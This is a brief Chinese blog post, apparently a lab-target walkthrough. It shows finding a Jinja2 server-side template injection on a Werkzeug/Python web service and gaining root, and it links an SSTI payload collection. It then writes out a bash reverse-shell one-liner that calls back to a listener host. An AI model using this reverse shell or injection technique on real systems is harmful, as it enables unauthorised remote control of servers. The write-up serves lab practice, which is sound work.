内网靶机实战

IP地址

http://121.37.186.22/?name=2023

访问

发现name可以修改回显的结果

这时再看看 Response Headers

可知 Server: Werkzeug/2.0.3 Python/3.6.8 ,尝试 Jinja2 SSTI:

测试

发现确实存在SSTI漏洞

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#exploit-the-ssti-by-calling-ospopenread

拿到了root权限

所以不需要提权

很明显ID参数是执行命令

可以利用burp进行反弹shell

利用bash反弹shell


bash -i >& /dev/tcp/192.168.52.128/6666 0>&1

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值